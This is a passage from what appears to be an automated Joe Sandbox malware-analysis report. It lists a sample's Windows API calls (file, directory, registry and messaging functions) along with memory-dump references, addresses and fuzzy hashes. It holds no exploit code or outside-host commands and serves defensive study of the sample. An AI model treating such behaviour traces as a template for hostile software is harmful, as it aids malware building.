                                                                    • Associated: 00000000.00000002.1542528019.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1543826830.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_ln5S7fIBkY.jbxd
                                                                    Similarity
                                                                    • API ID: File$AttributesCreate
                                                                    • String ID:
                                                                    • API String ID: 415043291-0
                                                                    • Opcode ID: e3266cf20b616526e148e4639a7b0fb2c73eec3b674a7d239963b130731368bc
                                                                    • Instruction ID: 684cdbd871a87963be1dc25f749e3f1c2e3aca1a790447dc63e6e481d8426dbe
                                                                    • Opcode Fuzzy Hash: e3266cf20b616526e148e4639a7b0fb2c73eec3b674a7d239963b130731368bc
                                                                    • Instruction Fuzzy Hash: 5DD09E31254301AFEF098F20DE16F2EBBA2EB84B05F11552CB786940E0DA7158199B15
                                                                    APIs
                                                                    • GetFileAttributesW.KERNELBASE(?,?,0040596D,?,?,00000000,00405B43,?,?,?,?), ref: 00405D6D
                                                                    • SetFileAttributesW.KERNEL32(?,00000000), ref: 00405D81
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1542390248.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.1542325043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542428380.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1543826830.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_ln5S7fIBkY.jbxd
                                                                    Similarity
                                                                    • API ID: AttributesFile
                                                                    • String ID:
                                                                    • API String ID: 3188754299-0
                                                                    • Opcode ID: abb1859115452ae29e15aed1e23886b2a100c548e8c413493f0cbd9ae974b18a
                                                                    • Instruction ID: 56b75d8f9ca2641e27e40e0bc5846bc1deeaaca66535f557d4a9eea11918b9db
                                                                    • Opcode Fuzzy Hash: abb1859115452ae29e15aed1e23886b2a100c548e8c413493f0cbd9ae974b18a
                                                                    • Instruction Fuzzy Hash: 39D01272504421AFC2512738EF0C89BBF95DF543717128B35FEE9A22F0CB314C568A98
                                                                    APIs
                                                                    • CreateDirectoryW.KERNELBASE(?,00000000,0040335F,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,76F93420,004035B6,?,00000006,00000008,0000000A), ref: 00405851
                                                                    • GetLastError.KERNEL32(?,00000006,00000008,0000000A), ref: 0040585F
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1542390248.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.1542325043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542428380.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1543826830.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_ln5S7fIBkY.jbxd
                                                                    Similarity
                                                                    • API ID: CreateDirectoryErrorLast
                                                                    • String ID:
                                                                    • API String ID: 1375471231-0
                                                                    • Opcode ID: 5aaa147db34fee021f71137ce00f1128120fffe197b4e0338bd4cd09c611a0b2
                                                                    • Instruction ID: 569726fefb5a692a208b00f3c4627a0038051db83374957b12f20e82e1ac62f2
                                                                    • Opcode Fuzzy Hash: 5aaa147db34fee021f71137ce00f1128120fffe197b4e0338bd4cd09c611a0b2
                                                                    • Instruction Fuzzy Hash: 97C08C71211501DAC7002F318F08B073A50AB20340F15883DA64AE00E0CA308024D92D
                                                                    APIs
                                                                    • WritePrivateProfileStringW.KERNEL32(00000000,00000000,?,00000000), ref: 00402343
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1542390248.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.1542325043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542428380.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1543826830.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_ln5S7fIBkY.jbxd
                                                                    Similarity
                                                                    • API ID: PrivateProfileStringWrite
                                                                    • String ID:
                                                                    • API String ID: 390214022-0
                                                                    • Opcode ID: 5fb29c7ac6bd4be6067060594f6abdd8dc98f2d64ebda3ebf196088e56367313
                                                                    • Instruction ID: c1725c34c84eed099ded2eadaed0aef72a921931f8640c1422412bc8ca1d20e4
                                                                    • Opcode Fuzzy Hash: 5fb29c7ac6bd4be6067060594f6abdd8dc98f2d64ebda3ebf196088e56367313
                                                                    • Instruction Fuzzy Hash: 89E086315046246BEB1436F10F8DABF10589B54305B19053FBE46B61D7D9FC0D81526D
                                                                    APIs
                                                                    • RegCreateKeyExW.KERNELBASE(00000000,?,00000000,00000000,00000000,?,00000000,?,00000000,?,?,?,00402CF2,00000000,?,?), ref: 0040615B
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1542390248.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.1542325043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542428380.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1543826830.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_ln5S7fIBkY.jbxd
                                                                    Similarity
                                                                    • API ID: Create
                                                                    • String ID:
                                                                    • API String ID: 2289755597-0
                                                                    • Opcode ID: e8292e86e66d8bfc399a73dea3ede4946860b06fd3b50e0b30bb299c90100862
                                                                    • Instruction ID: 5f0451bdd463ed866e2305ac1dfee878cc5b4d333075ebda4e05e47d22d2a603
                                                                    • Opcode Fuzzy Hash: e8292e86e66d8bfc399a73dea3ede4946860b06fd3b50e0b30bb299c90100862
                                                                    • Instruction Fuzzy Hash: 6BE0E672110109BEDF099F50DD0AD7B371DE704304F01452EFA06D5051E6B5AD305674
                                                                    APIs
                                                                    • ReadFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,?,?,00403321,00000000,00000000,00403168,?,00000004,00000000,00000000,00000000), ref: 00405E24
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1542390248.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.1542325043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542428380.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1543826830.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_ln5S7fIBkY.jbxd
                                                                    Similarity
                                                                    • API ID: FileRead
                                                                    • String ID:
                                                                    • API String ID: 2738559852-0
                                                                    • Opcode ID: 7739e01b11ed9e02f3c754170f73e593db9a2046c62570b976e55369a775b70d
                                                                    • Instruction ID: 994fac52afecd872c6575aa209eb3fbbfd601c2a51b89c6ee9ed5d101180f43c
                                                                    • Opcode Fuzzy Hash: 7739e01b11ed9e02f3c754170f73e593db9a2046c62570b976e55369a775b70d
                                                                    • Instruction Fuzzy Hash: 93E08C3220525AABCF109F51CC04EEB3B6CEB04360F000832FD98E2040D230EA219BE4
                                                                    APIs
                                                                    • WriteFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,?,?,004032D7,000000FF,0078B6D8,?,0078B6D8,?,?,00000004,00000000), ref: 00405E53
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1542390248.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.1542325043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542428380.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1543826830.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_ln5S7fIBkY.jbxd
                                                                    Similarity
                                                                    • API ID: FileWrite
                                                                    • String ID:
                                                                    • API String ID: 3934441357-0
                                                                    • Opcode ID: 02dc4867d73beddbae7b6aa94ca18310df5187db1130d79069d379e72bcbc858
                                                                    • Instruction ID: 720248cc98aac2988b2abacb793a2dea5f933c74ab6652834825bf215bbdf934
                                                                    • Opcode Fuzzy Hash: 02dc4867d73beddbae7b6aa94ca18310df5187db1130d79069d379e72bcbc858
                                                                    • Instruction Fuzzy Hash: 72E08C3220025AABCF109F60DC00AEB3B6CFB007E0F048432F951E3040D230EA208FE4
                                                                    APIs
                                                                    • RegOpenKeyExW.KERNELBASE(00000000,00000000,00000000,?,?,?,?,?,00406192,?,00000000,?,?,: Completed,?), ref: 00406128
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1542390248.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.1542325043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542428380.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1543826830.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_ln5S7fIBkY.jbxd
                                                                    Similarity
                                                                    • API ID: Open
                                                                    • String ID:
                                                                    • API String ID: 71445658-0
                                                                    • Opcode ID: a8e94fdf895113144ef30ac0413fc9f69bed743b5e5124c6f76e238eb3875bc5
                                                                    • Instruction ID: 68c61e8d1810f1ea9cab55705828a401d3ebcdae1eadef42580152fd7570d6fd
                                                                    • Opcode Fuzzy Hash: a8e94fdf895113144ef30ac0413fc9f69bed743b5e5124c6f76e238eb3875bc5
                                                                    • Instruction Fuzzy Hash: 4BD0123204020EBBDF11AE909D01FAB3B1DEB08350F014826FE06A80A2D776D530AB54
                                                                    APIs
                                                                    • SetFileAttributesW.KERNELBASE(00000000,?,000000F0), ref: 004015AE
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1542390248.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.1542325043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542428380.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1543826830.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_ln5S7fIBkY.jbxd
                                                                    Similarity
                                                                    • API ID: AttributesFile
                                                                    • String ID:
                                                                    • API String ID: 3188754299-0
                                                                    • Opcode ID: f851741033878782bd382afd736986932f0f82490c74007ecaa1b2c921d2c013
                                                                    • Instruction ID: c073ba0ee5163cb04706f99935c2f3c73a5a9b1a05bee32f9da8622fc5c815d0
                                                                    • Opcode Fuzzy Hash: f851741033878782bd382afd736986932f0f82490c74007ecaa1b2c921d2c013
                                                                    • Instruction Fuzzy Hash: 68D01272B04100D7DB50DBE4AF4899D73A4AB84369B348577E102F11D0DAB9D9515B29
                                                                    APIs
                                                                    • SendMessageW.USER32(?,00000000,00000000,00000000), ref: 0040426C
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1542390248.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.1542325043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542428380.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1543826830.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_ln5S7fIBkY.jbxd
                                                                    Similarity
                                                                    • API ID: MessageSend
                                                                    • String ID:
                                                                    • API String ID: 3850602802-0
                                                                    • Opcode ID: cb0b7ebd38eb4799b8f4196fcc58e5a20f32a56ef1c2a101366cf6dcdfe2cd36
                                                                    • Instruction ID: 075ccd8dd3a5a116662ee2c7ada5c50e1725780f7e4f2104ac300affc7ba1253
                                                                    • Opcode Fuzzy Hash: cb0b7ebd38eb4799b8f4196fcc58e5a20f32a56ef1c2a101366cf6dcdfe2cd36
                                                                    • Instruction Fuzzy Hash: 09C04CB1744201AADE108B609D45F0777585790740F158569B350E50E4C674E450D62D
                                                                    APIs
                                                                    • SendMessageW.USER32(00000028,?,00000001,0040406E), ref: 00404251
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1542390248.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.1542325043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542428380.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1543826830.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_ln5S7fIBkY.jbxd
                                                                    Similarity
                                                                    • API ID: MessageSend
                                                                    • String ID:
                                                                    • API String ID: 3850602802-0
                                                                    • Opcode ID: f360a53124e97c409135d1b53ccadec94ff58fec8389da7a5f3de8c8d06ef766
                                                                    • Instruction ID: 5dee82f2d739acac93035fb571c052082ac1606baee7bb158d490297d0aa81d3
                                                                    • Opcode Fuzzy Hash: f360a53124e97c409135d1b53ccadec94ff58fec8389da7a5f3de8c8d06ef766
                                                                    • Instruction Fuzzy Hash: 99B09236190A00AADE614B40DE49F457A62A7A8701F00C029B240640B0CAB200A0DB09
                                                                    APIs
                                                                    • SetFilePointer.KERNELBASE(?,00000000,00000000,004030A4,?,?,00000006,00000008,0000000A), ref: 00403332
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1542390248.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.1542325043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542428380.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
